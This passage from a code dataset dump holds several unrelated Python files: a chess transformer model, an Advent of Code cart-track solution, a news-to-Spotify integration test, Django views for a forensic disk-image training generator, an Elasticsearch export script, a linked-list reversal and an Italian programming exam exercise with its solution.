self.action_head = Sequential(Linear(d_model,\n 256*2), View(256, 2))\n self.seq_crit = CrossEntropyLoss(256)\n self.visual_crit = CrossEntropyLoss(13)\n self.action_crit = CrossEntropyLoss(2)\n self.softmax = torch.nn.Softmax(dim=-1)\n self.to(device)\n\n def numel(self):\n return sum(p.numel() for p in self.parameters())\n\n def forward(self, game=None, seq_length=None, targets=None):\n (seq_input, seq_target, visual_target,\n action_target) = targets or maketargets(\n game, seq_length)\n # print('model forward shapes', seq_input.shape,\n # seq_target.shape,\n # visual_target.shape,\n # action_target.shape)\n model_output = self.model(seq_input)\n seq_output = self.seq_head(model_output)\n visual_output = self.visual_head(model_output)\n action_output = self.action_head(model_output)\n seq_output += 1 - 1/action_target\n seq_loss = self.seq_crit(seq_output, seq_target)\n visual_loss = self.visual_crit(visual_output, visual_target)\n action_loss = self.action_crit(action_output, action_target)\n return (seq_loss, visual_loss, action_loss)\n\n @torch.no_grad()\n def inference(self, gamestring):\n seq_input = bytes_to_tensor(gamestring)\n model_output = self.model(seq_input)\n seq_output = self.seq_head(model_output)\n visual_output = self.visual_head(model_output)\n action_output = self.action_head(model_output)\n seq_probs = self.softmax(seq_output)\n visual_probs = self.softmax(visual_output)\n action_probs = self.softmax(action_output)\n return (seq_probs, visual_probs, action_probs)\n\n def boardstring(self, game, temp=1.0):\n if game == \"\":\n gamestring = \"\\n\"\n else:\n gamestring = \"\\n\" + game.strip() + \" \"\n visual_probs = self.inference(gamestring)[1]\n probs = visual_probs[-1]\n result = \"\"\n pieces = \".KQNBRPkqnbrp\"\n for i in range(64):\n result += pieces[Categorical(probs=\n probs[i]**(1.0/temp)).sample().item()\n if temp > 0 else torch.argmax(probs[i])\n .item()]\n if i%8 == 7:\n result += \"\\n\"\n return result\n\n def move(self, game, temp=1.0):\n if game == \"\":\n gamestring = \"\\n\"\n else:\n gamestring = \"\\n\" + game.strip() + \" \"\n board = chess.Board()\n moves = game.split()\n for move in moves:\n board.push_san(move)\n legal = [board.san(move) for move in\n board.legal_moves]\n if len(legal) == 0:\n return None\n if len(legal) == 1:\n return legal[0]\n newmove = \"\"\n idx = 0\n while True:\n k = len(newmove)\n S = set(ord(move[k]) for move in legal\n if move.startswith(newmove) and\n len(move) > k)\n probs = self.inference(gamestring +\n newmove)[0].view(-1)[-256:] # just [-1]?\n for i in range(256):\n if i not in S:\n probs[i] = 0\n newmove += chr(Categorical(probs=probs**(\n 1.0/temp)).sample().item()\n if temp > 0 else torch.argmax(probs).item())\n left = [move for move in legal\n if move.startswith(newmove)]\n if len(left) == 0:\n return (random.choice(legal) if temp > 0\n else legal[0])\n if len(left) == 1:\n return left[0]\n","repo_name":"shaunharker/scholar","sub_path":"scholar/chess/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73925887159","text":"# Day 13 - Puzzle 2\n# What is the location of the last cart at the end of the first tick where it\n# is the only cart left?\n\nfrom part_1 import CartKind, TrackKind\n\n\ndef _tick(carts, grid):\n types = {\n TrackKind.EW: {\n CartKind.RIGHT: CartKind.RIGHT,\n CartKind.LEFT: CartKind.LEFT\n },\n TrackKind.NS: {\n CartKind.UP: CartKind.UP,\n CartKind.DOWN: 
CartKind.DOWN\n },\n TrackKind.NE_SW: {\n CartKind.RIGHT: CartKind.DOWN,\n CartKind.UP: CartKind.LEFT,\n CartKind.LEFT: CartKind.UP,\n CartKind.DOWN: CartKind.RIGHT\n },\n TrackKind.NW_SE: {\n CartKind.RIGHT: CartKind.UP,\n CartKind.DOWN: CartKind.LEFT,\n CartKind.LEFT: CartKind.DOWN,\n CartKind.UP: CartKind.RIGHT\n }\n }\n xr_directions = [CartKind.UP, CartKind.RIGHT, CartKind.DOWN, CartKind.LEFT]\n steps = 0\n while True:\n carts = sorted(\n [c for c in carts if not c['crashed']],\n key=lambda x: x['location']\n )\n\n if len(carts) == 1:\n return carts[0]['location']\n\n for cart in carts:\n cart_x, cart_y = cart['location']\n cart_type = cart['type']\n cart_dir = cart['direction']\n\n if cart_type == CartKind.LEFT:\n cart_x -= 1\n elif cart_type == CartKind.RIGHT:\n cart_x += 1\n elif cart_type == CartKind.UP:\n cart_y -= 1\n elif cart_type == CartKind.DOWN:\n cart_y += 1\n cart['location'] = (cart_x, cart_y)\n\n for c in carts:\n if (\n not c['crashed'] and\n cart['location'] == c['location'] and\n cart is not c\n ):\n cart['crashed'] = True\n c['crashed'] = True\n\n grid_loc_kind = TrackKind(grid[cart_y][cart_x])\n if grid_loc_kind == TrackKind.XR:\n if cart_dir == 0:\n cart['direction'] = 1\n cart['type'] = \\\n xr_directions[(xr_directions.index(cart_type) - 1) % 4]\n elif cart_dir == 1:\n cart['direction'] = 2\n elif cart_dir == 2:\n cart['direction'] = 0\n cart['type'] = \\\n xr_directions[(xr_directions.index(cart_type) + 1) % 4]\n else:\n cart['type'] = types[grid_loc_kind][cart_type]\n\n steps += 1\n return carts\n\n\ndef _create_state(file):\n carts = []\n grid = []\n with open(file) as f:\n for line in f:\n row = []\n row.extend([i for i in line.strip('\\n')])\n grid.append(row)\n\n for y, row in enumerate(grid):\n for x, cell in enumerate(row):\n if cell in '^v<>':\n if (\n CartKind(cell) == CartKind.UP or\n CartKind(cell) == CartKind.DOWN\n ):\n grid[y][x] = TrackKind.NS\n elif (\n CartKind(cell) == CartKind.LEFT or\n CartKind(cell) == CartKind.RIGHT\n ):\n grid[y][x] = TrackKind.EW\n\n cart_state = {\n 'location': (x, y),\n 'type': CartKind(cell),\n 'direction': 0,\n 'crashed': False\n }\n carts.append(cart_state)\n elif cell in '|-\\\\/+':\n grid[y][x] = TrackKind(cell)\n\n return carts, grid\n\n\n# Test\nTEST_CARTS, TEST_GRID = _create_state('./example-2.txt')\nassert(_tick(TEST_CARTS, TEST_GRID) == (6, 4))\n\n# Solution\nCARTS, GRID = _create_state('./day13-input.txt')\nprint(_tick(CARTS, GRID))\n","repo_name":"aos/advent","sub_path":"2018/day13/part_2.py","file_name":"part_2.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"74584916279","text":"#!/usr/bin/env python3\n\n# Integration tests for Sprint - all the functionality we\n# have implemented so far we try to test together after it\n# has been 'unit tested' and observe the results are consistent\n# with what we expect.\n\nimport re\nimport random\nimport time\nimport json\n\nimport sys\nsys.path.append(\"../../src\")\nimport news_interface as n_int\nimport watson_nlu_interface as w_int\nimport spotify_interface as s_int\n\ndef main():\n # tracks \n tracks = []\n si = s_int.spotify_interface(\"../../data/session_details.csv\")\n ni = n_int.news_interface(\"../../data/session_details.csv\")\n wi = w_int.watson_nlu_interface(\"../../data/session_details.csv\")\n\n # request token from spotify API\n si.request_token()\n \n # load excluded sources from the fixtures\n excl_sources = 
get_excluded_sources(\"fixtures/exclusion\")\n \n # get 10 breaking news excluding the BBC News source\n news = ni.get_breaking_news(10, excl_sources)\n # check we got news at all\n if len(news) != 0:\n # now, pipe those news descriptions into the watson nlu text analyzer\n for n in news:\n # store it in our list of term lists\n n_terms = wi.query_text_analyzer(n.headline)\n # tokenize it\n tokens = tokenize_terms(n_terms)\n # get best fit\n tracks += get_best_fit_track(si, tokens)\n # now, print out those terms\n pretty_print_tracks(tracks, news)\n # now print the Json\n print(\"JSON output:\")\n print(output_to_json(tracks, news))\n else:\n print(\"We received no news.\")\n\n # INTEGRATION TEST: make sure the outputted terms make sense in relation\n # to today's news by checking what the top 10 breaking news are today\n # in Great Britain, excepting BBC News articles.\n\n# this method takes a list of strings which may be sentences\n# or may have characters such as commas, dots, exclamation marks\n# and so on, and it returns a list of words without those characters\n# as 'tokens'\ndef tokenize_terms(terms):\n tokens = []\n delims = \" |\\-|,|\\.|:|!|\\?|;\"\n for t in terms:\n tokens += list(filter(None, re.split(delims, t)))\n # return tokens, but make sure they are unique (no duplicates)\n return list(dict.fromkeys(tokens))\n\n# this method returns a track which matches a token, or n\n# combination of tokens from Spotify\n# this assumes the Spotify Interface passed has already\n# requested a token\ndef get_best_fit_track(si, tokens):\n used = []\n # if the given tokens are None or of length 0,\n # return None\n if tokens is None or len(tokens) < 1:\n return None\n elif si is None:\n # if the spotify interface is None, return None\n return None\n # make sure we get a random seed\n random.seed(time.time())\n # progressively add terms from the tokens and stop where\n # we stop receiving tracks \n while True:\n # token we picked for this iteration\n curr = tokens[random.randint(0, len(tokens) - 1)]\n # remove the token we picked for this iteration\n tokens.remove(curr)\n # search with our previous tokens + new one\n track = si.search_tracks(used + [curr], 1)\n if len(track) != 0:\n # at least 1 track matches\n # incorporate our current token\n # to our set and remove it from tokens\n used.append(curr)\n if len(tokens) < 1:\n # we have no more tokens to try\n # so we quit\n break\n # the final answer will be a search with our 'used'\n # tokens\n return si.search_tracks(used, 1)\n\n# this method takes a list of Track objects\n# and prints their contents in an orderly\n# manner\ndef pretty_print_tracks(tracks, news = []):\n do_news = False\n if len(news) > 0:\n do_news = True\n for t in tracks:\n print(\"==============================================\")\n if do_news:\n art = news[tracks.index(t)]\n print(\"News used:\\nSource: {0}\\nHeadline: {1}\\n\".format(art.source, art.headline))\n print(\"Title:\\t\\t\", t.name)\n print(\"Artists:\\t\", \", \".join(t.artists))\n print(\"Duration:\\t\", t.duration_readable())\n print(\"Popularity:\\t\", \"{:02d}/100\".format(t.popularity))\n print(\"External URL:\\t\", t.external_url)\n prev_url = \"N/A\"\n if t.preview_url != \"\":\n prev_url = t.preview_url\n print(\"Preview URL:\\t\", prev_url)\n print(\"==============================================\")\n\n# this method gets each line item for\n# a given filename and returns that line stripped.\n# this is used to get the excluded sources\n# from a file, where each source to be excluded\n# from the news 
result is written in its own\n# line in a file\ndef get_excluded_sources(filename):\n out = []\n try:\n # try to open the file\n # read each line and append\n # it to our list\n with open(filename) as f:\n for line in f:\n out.append(line.strip())\n except IOError:\n # there was an issue with I/O\n # report this to the user\n print(f\"Error trying to open file at {filename}\")\n # return our list, empty if there was an\n # issue with I/O\n return out\n# this method takes the tracks we\n# generated from the news headlines\n# or terms given by the user, along\n# with the news (if we used any)\n# and outputs all the data in JSON\n# format so the UX application\n# can better parse it and show\n# it in its interface\n#\n# this gets called only if the --json\n# option is activated by the caller\ndef output_to_json(tracks, news = []):\n # items which contain the news used\n # (if any) and the track\n items = []\n # did we get news?\n no_news = False\n if news == []:\n # no news\n no_news = True\n # go through each track\n for t in tracks:\n it = {}\n # if we do have news\n if not no_news:\n # get the corresponding news\n n = news[tracks.index(t)]\n it['news'] = news_to_dict(n)\n else:\n it['news'] = {}\n # now do the track\n it['track'] = track_to_dict(t)\n # add this item to our list\n # of items\n items.append(it)\n # once we are done with all tracks\n # and news, return the result\n # as json\n try:\n # build json string\n json_data = json.dumps(items)\n # all good, return json data\n return json_data\n except:\n # if anything went wrong\n return None\n\n# this method takes a track object and\n# turns it into a dictionary\n# where each object data member\n# is a key:value pair. The\n# duration_readable(...) method from\n# the Track object is called and the\n# outputted string is put into another\n# key:value pair\ndef track_to_dict(track):\n if track is None:\n return None\n else:\n d = {\"artists\" : track.artists,\n \"duration\" : track.duration_readable(),\n \"name\" : track.name,\n \"popularity\" : track.popularity,\n \"preview_url\" : track.preview_url,\n \"external_url\" : track.external_url}\n return d\n\n# this method takes a News object\n# and returns a dictionary where\n# its object data members are\n# key:value pairs\ndef news_to_dict(_news):\n if _news is None:\n return None\n else:\n d = {\"headline\" : _news.headline,\n \"source\" : _news.source}\n return d\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"Software-Engineering-Group-6/NewsSpotify","sub_path":"tests/integration/s3_intgr_main.py","file_name":"s3_intgr_main.py","file_ext":"py","file_size_in_byte":7446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"23360095418","text":"from django.http import HttpResponseRedirect, HttpResponse\nfrom django.core.urlresolvers import reverse\nfrom django.views import generic\n\nfrom django.db import DatabaseError\nimport sys\nimport datetime\nfrom django.core.context_processors import csrf\nfrom django.shortcuts import render, get_object_or_404, render_to_response\nfrom ui.forms import RequestCaseForm,RequestWebhistoryForm\nfrom ui.uitools import errlog\n\nfrom ui.models import Case, TrivialFileItem, User, FileSystem, HidingMethod\nfrom ui.models import SecretFileItem, SecretStrategy, Image, Webhistory\nfrom ui.models import HiddenObject, TrivialObject, WebMethod\n\nclass Selection():\n selected = 0\n \n @staticmethod\n def getSelection():\n return Selection.selected\n \n @staticmethod\n def setSelection(selection):\n 
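# class attribute: the chosen case id persists between requests\n 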
Selection.selected = selection\n \n \ndef getFileType(content):\n \n __document_list = [\"application/pdf\",\"application/vnd.openxmlformats-officedocument.wordprocessingml.document\",\n \"application/msword\",\"application/vnd.oasis.opendocument.text\",\n \"application/vnd.openxmlformats-officedocument.presentationml.presentation\",\n \"application/rtf\",\n \"application/vnd.ms-excel\",\n \"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet\"]\n __application_list = [\"application/octet-stream\", \"application/x-shellscript\",\n \"application/x-ms-dos-executable\",\"application/x-java-archive\"]\n __archive_list = [\"application/zip\",\"application/x-gzip\",\"application/x-rar\"]\n __text_list = [\"text/plain\"]\n __audio_list = [\"audio/mpeg\"]\n \n if content.startswith(\"image/\"):\n return 0\n if content in __document_list:\n return 1\n if content in __application_list:\n return 6\n if content in __archive_list:\n return 9\n if content.startswith(\"text/\"):\n return 8\n if content.startswith(\"audio/\"):\n return 4\n if content.startswith(\"video/\"):\n return 5\n \n return 7\n\ndef initDbView(request):\n foo = User.objects.all()\n if len(foo) == 0:\n u1 = User(name=\"forge\", role=0, valid_until=\"2013-12-31\")\n u1.save()\n f = FileSystem(name=\"NTFS\", pythonpath=\"ntfsparser.ntfsc\",\n pythoncreatecommand=\"NTFSCreateImage\", \n fsclass = \"NTFSC\")\n f.save()\n f = FileSystem(name=\"FAT12\", pythonpath=\"fat.fat\",\n pythoncreatecommand=\"FAT12CreateImage\", \n fsclass = \"FATC\")\n f.save()\n f = FileSystem(name=\"FAT16\", pythonpath=\"fat.fat\",\n pythoncreatecommand=\"FAT16CreateImage\", \n fsclass = \"FATC\")\n f.save()\n f = FileSystem(name=\"FAT32\", pythonpath=\"fat.fat\",\n pythoncreatecommand=\"FAT32CreateImage\", \n fsclass = \"FATC\")\n f.save()\n f = FileSystem(name=\"FAT\", pythonpath=\"fat.fat\",\n pythoncreatecommand=\"FATGenericCreateImage\", \n fsclass = \"FATC\")\n f.save()\n h = HidingMethod(name=\"ADS\", priority = 2, pythonpath=\"hiding.ads\",\n pythonhideclass = \"AlternateDataStream\")\n\n h.save()\n h = HidingMethod(name=\"Deleted file\", priority = 3, \n pythonpath=\"hiding.deletedfile\", \n pythonhideclass = \"DeletedFile\")\n h.save()\n h = HidingMethod(name=\"Extension change\", priority = 2, \n pythonpath=\"hiding.extensionchange\", \n pythonhideclass=\"ExtensionChange\")\n h.save()\n h = HidingMethod(name=\"Concatenate\", priority = 2, \n pythonpath=\"hiding.concatenate\", \n pythonhideclass=\"ConcatenateFile\")\n h.save()\n h = HidingMethod(name=\"File slack\", priority = 5, \n pythonpath=\"hiding.fileslack\", \n pythonhideclass=\"FileSlack\")\n h.save()\n h = HidingMethod(name=\"Steganography\", priority = 1, \n pythonpath=\"hiding.steganography\", \n pythonhideclass=\"Steganography\")\n h.save()\n h = HidingMethod(name=\"Not hidden\", priority = 4, \n pythonpath=\"hiding.donothide\", \n pythonhideclass=\"DoNotHideFile\")\n h.save()\n h = HidingMethod(name=\"Unallocated space\", priority = 5, \n pythonpath=\"hiding.unallocated_space\", \n pythonhideclass=\"UnallocatedSpace\")\n h.save()\n wmh = WebMethod(name=\"URL and search\", priority = 1, \n pythonpath=\"browserhistory.bhistory\", \n pythonhideclass=\"BrowserHistory\")\n wmh.save()\n c=Case(name=\"casetest\", owner=User.objects.get(name=\"forge\"), \n date_created=\"2013-06-01\", \n size=\"10M\", amount=3, garbage=False,fsparam1=8, weekvariance=26, \n filesystem= FileSystem.objects.get(name=\"NTFS\"),\n roottime=datetime.datetime(2010,7,16,3,42,42))\n c.save()\n 
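# attach sample trivial and secret strategies to the demo case\n 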
c.trivialstrategy_set.create(type=0, quantity=2, exact = True, \n path=\"/holiday\",\n dirtime = datetime.datetime(2010,12,24,17,0,0))\n c.trivialstrategy_set.create(type=1, quantity=2, exact = True, path=\"/doc\",\n dirtime = datetime.datetime(2011,2,28,9,30,15))\n c.secretstrategy_set.create(method=h, group = 1, filetime = datetime.datetime(2008,5,25,10,42,32), amount=1, placeall=False)\n c.save()\n \n return HttpResponse(\"ok\")\n\ndef IndexView(request):\n \n if request.method == \"POST\":\n click = request.POST.getlist(\"click2\")\n if not click:\n sys.stderr.write(\"no click\")\n else:\n Selection.setSelection(int(click[0]))\n __tmp, = Case.objects.filter(pk=Selection.getSelection())\n sys.stderr.write(__tmp.owner.name)\n \n table = Case.objects.all()\n return render(request, \"ui/main.html\", {'active_cases': table, 'selected_case': __tmp}) \n else:\n __tmp = None\n table = Case.objects.all()\n return render(request, \"ui/main.html\", {'active_cases': table, 'selected_case': __tmp}) \n\ndef trivial_file_view(request):\n \n if request.method == \"POST\":\n \"\"\"click = request.POST.getlist(\"click2\")\n if not click:\n sys.stderr.write(\"no click\")\n else:\n Selection.setSelection(int(click[0]))\n __tmp, = Case.objects.filter(pk=Selection.getSelection())\n sys.stderr.write(__tmp.owner.name)\n \n table = Case.objects.all()\"\"\"\n return render(request, \"ui/files.html\", {\"cfunction\": \"posttrivialfile\", \"instruction\": \"Drag and drop trivial files here\"}) \n else:\n\n return render(request, \"ui/files.html\", {\"cfunction\": \"posttrivialfile\", \"instruction\": \"Drag and drop trivial files here\"}) \n\ndef post_trivial_view(request):\n if request.method == \"POST\":\n \n tfile = request.FILES['file']\n ft = getFileType(tfile.content_type)\n if ft == 7:\n print >>sys.stderr, tfile.content_type\n \n \n\n t = TrivialFileItem(name=tfile.name, type=ft,file=tfile)\n try:\n t.save()\n except DatabaseError:\n try:\n t.save()\n except DatabaseError:\n pass\n \n \n return render(request, \"ui/files.html\", {\"cfunction\": \"posttrivialfile\", \"instruction\": \"Drag and drop trivial files here\"}) \n\ndef secret_file_view(request):\n return render(request, \"ui/files.html\", {\"cfunction\": \"postsecretfile\", \"instruction\": \"Drag and drop secret files here\"})\ndef post_secret_view(request):\n if request.method == \"POST\":\n \n sfile = request.FILES['file']\n\n t = SecretFileItem(name=sfile.name, file = sfile, group = 0)\n try:\n t.save()\n except DatabaseError:\n try:\n t.save()\n except DatabaseError:\n errlog(\"can't post secret file\")\n pass\n \n \n return render(request, \"ui/files.html\", {\"cfunction\": \"postsecretfile\", \"instruction\": \"Drag and drop secret files here\"}) \n\n\n \n \ndef imageView(request, iid=-1):\n if request.method == \"POST\":\n \n click = request.POST.getlist(\"click2\")\n if click:\n Selection.setSelection(int(click[0]))\n return HttpResponseRedirect(\"/ui/images\"+\"/\"+click[0])\n form = RequestCaseForm(request.POST)\n\n if u'create' in request.POST:\n if iid == -1:\n return HttpResponseRedirect(\"/ui/images\")\n case = Case.objects.get(pk=iid)\n if not case:\n return HttpResponseRedirect(\"/ui/images\")\n qres = case.processCase()\n if qres:\n return render(request, \"ui/creationreport.html\", \n {\"case\":case, \"success\": qres[0], \"notsuccess\": qres[1]})\n else:\n return HttpResponseRedirect(\"/ui/images\")\n return HttpResponseRedirect(\"/ui/images\")\n else:\n table = Case.objects.all() \n if iid == -1: \n form = RequestCaseForm()\n 
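# a case id was supplied: pre-fill the form from that existing case\n 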
else:\n try:\n c, = Case.objects.filter(pk=iid)\n form = RequestCaseForm(instance=c)\n except ValueError:\n return HttpResponseRedirect(\"/ui/images\")\n \n return render(request, \"ui/images.html\", {\"form\": form, \"active_cases\": table})\n\ndef webhistoryView(request, iid=-1):\n if request.method == \"POST\":\n \n click = request.POST.getlist(\"click2\")\n if click:\n Selection.setSelection(int(click[0]))\n return HttpResponseRedirect(\"/ui/webhistory\"+\"/\"+click[0])\n form = RequestWebhistoryForm(request.POST)\n if u'create' in request.POST: \n if iid == -1:\n return HttpResponseRedirect(\"/ui/webhistory\")\n case = Webhistory.objects.get(pk=iid)\n if not case:\n return HttpResponseRedirect(\"/ui/webhistory\")\n qres = case.processWebhistory()\n if qres:\n return render(request, \"ui/creationreport.html\", \n {\"case\":case, \"success\": qres[0], \"notsuccess\": qres[1]})\n else:\n return HttpResponseRedirect(\"/ui/webhistory\")\n return HttpResponseRedirect(\"/ui/webhistory\")\n else:\n table = Webhistory.objects.all() \n if iid == -1: \n form = RequestWebhistoryForm()\n else:\n try:\n c, = Webhistory.objects.filter(pk=iid)\n form = RequestWebhistoryForm(instance=c)\n except ValueError:\n return HttpResponseRedirect(\"/ui/webhistory\")\n \n return render(request, \"ui/webhistory.html\", {\"form\": form, \"active_cases\": table})\n \ndef solutionView(request, iid=-1):\n table = Case.objects.all()\n if request.method == \"POST\":\n click = request.POST.getlist(\"click2\") \n chosen_image = request.POST.getlist(\"chosenimage\")\n foo_bar = request.POST.items()\n if iid != -1 and u'submit' in request.POST:\n if not chosen_image:\n return HttpResponseRedirect(\"/ui/solution\"+\"/\"+str(iid))\n images = Image.objects.filter(case = iid)\n \n\n this_case = Case.objects.filter(pk=iid)[0]\n this_image = Image.objects.filter(pk=int(chosen_image[0]))[0]\n this_trivial = TrivialObject.objects.filter(image=this_image)\n this_secret = HiddenObject.objects.filter(image=this_image) \n if not images:\n return HttpResponseRedirect(\"/ui/solution\")\n #return render(request, \"ui/solution.html\", { \"active_cases\": table, \"created_images\": images}) \n return render(request, \"ui/report.html\", {\"case\": this_case, \"timage\": this_image, \n \"trivial\": this_trivial, \"secret\": this_secret}) \n if click:\n Selection.setSelection(int(click[0]))\n return HttpResponseRedirect(\"/ui/solution\"+\"/\"+click[0])\n\n\n\n\n\n return HttpResponseRedirect(\"/ui/solution\")\n \n\n else:\n \n if iid == -1: \n pass\n else:\n try:\n images = Image.objects.filter(case = iid)\n\n if not images:\n return HttpResponseRedirect(\"/ui/solution\")\n return render(request, \"ui/solution.html\", { \"active_cases\": table, \"created_images\": images}) \n except ValueError:\n return HttpResponseRedirect(\"/ui/solution\")\n \n return render(request, \"ui/solution.html\", { \"active_cases\": table})\n \n\n \n \n","repo_name":"hannuvisti/forge","sub_path":"forensic/ui/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13102,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"40"} +{"seq_id":"5847235029","text":"from enum_instrument import Builder, Type, Wood, Style\nfrom guitar import Guitar\nfrom guitar_specs import GuitarSpecs\nfrom inventory import Inventory\nfrom mandolin import Mandolin\nfrom mandolin_specs import MandolinSpecs\n\nspecification_1 = GuitarSpecs(Builder.FENDER, 'new', Type.AUCOUSTIC, Wood.MAHAGONY, Wood.MAHAGONY,12)\nspecification_2 = 
GuitarSpecs(Builder.MARTIN, 'old', Type.ELECTRIC, Wood.INDIAN_ROSEWOOD, Wood.MAHAGONY)\nspecification_3 = GuitarSpecs(Builder.FENDER, 'new', Type.AUCOUSTIC, Wood.INDIAN_ROSEWOOD, Wood.INDIAN_ROSEWOOD)\nspecification_4 = MandolinSpecs(Builder.FENDER, 'new', Type.OCTAVE, Wood.INDIAN_ROSEWOOD, Wood.INDIAN_ROSEWOOD,Style.A_STYLE)\n\nguitar_1 = Guitar('2134', 34.5, specification_1)\nguitar_2 = Guitar('1234', 44.5, specification_2)\nguitar_3 = Guitar('2222', 69.5, specification_3)\nmandolin_1 = Mandolin('1098', 79.3, specification_4)\n\nprint(guitar_2.__dict__)\nprint(mandolin_1.__dict__)\n\ninventory_1 = Inventory()\ninventory_1.add_instrument(guitar_1)\ninventory_1.add_instrument(guitar_2)\ninventory_1.add_instrument(guitar_3)\ninventory_1.add_instrument(mandolin_1)\n\ng = inventory_1.search_instrument(specification_4)\nprint(\"search mandolin\")\nfor elem in g:\n print(elem.to_dict())\n","repo_name":"kiritka-jain/instrument_inventory","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"18780093357","text":"from elasticsearch import Elasticsearch, exceptions\n# declare globals for the Elasticsearch client host\nDOMAIN = \"elasticsearch\"\nPORT = 9200\nhost = str(DOMAIN) + \":\" + str(PORT)\nindex = \"autoscout-singlecar\"\nclient = Elasticsearch(host)\ndata = []\n\n# declare a match_all query dict object\nmatch_all = {\n \"size\": 50,\n \"sort\": { \"created\": \"desc\"},\n \"query\": {\n \"match_all\": {}\n }\n}\n# make a search() request to get all docs in the index\nresp = client.search(\n index = index,\n body = match_all,\n scroll = '2s' # length of time to keep search context\n)\n\n# keep track of past scroll _id\nold_scroll_id = resp['_scroll_id']\nwhile len(resp['hits']['hits']):\n # consume the hits of the current page first, so the initial\n # batch returned by search() is not skipped\n for doc in resp['hits']['hits']:\n data.append(doc[\"_source\"])\n resp = client.scroll(\n scroll_id = old_scroll_id,\n scroll = '2s' # length of time to keep search context\n )\n # keep track of past scroll _id\n old_scroll_id = resp['_scroll_id']\n\n# save\nimport pandas as pd\ndata = pd.DataFrame.from_dict(data)\ndata = data.set_index(\"URL\")\ndata.to_csv(\"data/output/autoscout-singlecars.csv.gz\",compression=\"gzip\")","repo_name":"JustinGuese/docker-autoscout-handler","sub_path":"docker-updatemeanvalues/elasticToPandas.py","file_name":"elasticToPandas.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"36735665811","text":"# Definition for singly-linked list.\r\n# class ListNode:\r\n# def __init__(self, val=0, next=None):\r\n# self.val = val\r\n# self.next = next\r\nclass Solution:\r\n def reverseList(self, head: Optional[ListNode]) -> Optional[ListNode]:\r\n prev = head\r\n if prev is None:\r\n return head\r\n curr = prev.next\r\n if curr is None:\r\n return head\r\n forward = curr.next\r\n if forward is None:\r\n head = curr\r\n curr.next = prev\r\n prev.next = None\r\n return head\r\n prev.next = None\r\n while forward.next is not None:\r\n curr.next = prev\r\n prev = curr\r\n curr = forward\r\n forward = forward.next\r\n head = forward\r\n forward.next = curr\r\n curr.next = prev\r\n return head","repo_name":"Sagkun343/Leetcode","sub_path":"Reverse Linked List.py","file_name":"Reverse Linked List.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"183332427","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n################################################################################\n################################################################################\n################################################################################\n\n# Operazioni da svolgere PRIMA DI TUTTO:\n# 1) Salvare questo file come program.py\n# 2) Indicare nelle variabili in basso il proprio\n# NOME, COGNOME e NUMERO DI MATRICOLA\n\nnome = \"NOME\"\ncognome = \"COGNOME\"\nmatricola = \"MATRICOLA\"\n\n################################################################################\n################################################################################\n################################################################################\n# ---------------------------- SUGGERIMENTI PER IL DEBUG --------------------- #\n# Per eseguire solo alcuni dei test, si possono commentare le voci con cui la\n# lista 'test' è assegnata alla FINE di grade.py\n#\n# Per debuggare le funzioni ricorsive potete disattivare il test di ricorsione\n# settando DEBUG=True nel file grade.py\n#\n# DEBUG=True vi attiva anche lo STACK TRACE degli errori per sapere il numero\n# di linea di program.py che genera l'errore.\n################################################################################\n\n# ----------------------------------- EX.1 ----------------------------------- #\n\"\"\"\nEsercizio 1: 6 punti\n\nSi scriva una funzione ex1(file_query, file_db, k) che prende in\ningresso due stringhe file_query e file_db che puntano a due file di\ntesto, mentre k e' un intero. I file contengono punti in 2D su ogni\nriga. Ogni riga contiene le coordinate intere x e y separate da uno\nspazio, come ad esempio:\n\n -5 -5\n 10 5\n\nLa funzione deve leggere il contenuto dei file. Per ogni punto Q nel\nfile_query, si deve cercare gli indici dei k punti piu vicini a Q in\nfile_db. Per la distanza fra (x1, y1) e (x2, y2) si usi:\n(x1-x2)² + (y1-y2)²\n\nAd esempio, se k=2 e Q=(-5, -5) e DB e':\n\n 1 1\n -3 -5\n -5 -3\n 20 10\n\nallora gli indici e le distanze in DB rispetto a Q sono:\n\n| indice | x | y | dist |\n| 0 | 1 | 1 | 72 |\n| 1 | -3 | -5 | 4 |\n| 2 | -5 | -3 | 4 |\n| 3 | 20 | 10 | 850 |\n\nI due vicini a Q sono la lista [2, 1] in quanto hanno le k=2\ndistanze minori. In caso di parita' sulla distanza, come in questo\ncaso, si ritornano gli indici dal piu grande al piu piccolo.\n\nSi ritorni la lista che contiene le liste dei k indici vicini, per\nogni punto Q nel solito ordine in cui sono letti i punti Q dal\nfile_query.\n\nSe in ingresso abbiamo query_00.txt e db_00.txt e k=2, si deve ritornare:\n\n[[2, 1], [0, 3]]\n\"\"\"\n\n\ndef read_data(file_in):\n with open(file_in, mode='rt', encoding='utf8') as fr:\n data = []\n for idx, line in enumerate(fr):\n x, y = line.split()\n data.append((idx, (int(x), int(y))))\n return data\n\n\ndef ex1(file_query, file_db, k):\n query = read_data(file_query)\n db = read_data(file_db) # (idx, (x,y))\n rez = []\n for qq in query:\n idxs_pts = sorted(db,\n key=lambda p:\n (sum(map(lambda x1, x2: (x1-x2)**2, p[1], qq[1])),\n -p[0]))[:k]\n rez.append(list(map(lambda a: a[0], idxs_pts)))\n return rez\n\n\n# %% ----------------------------------- EX.2 ----------------------------------- #\n\"\"\"\nEsercizio 2: 6+3 punti\n\nScrivere una funzione che prenda in ingresso due nomi di file 'img_in'\ne 'img_out'. 
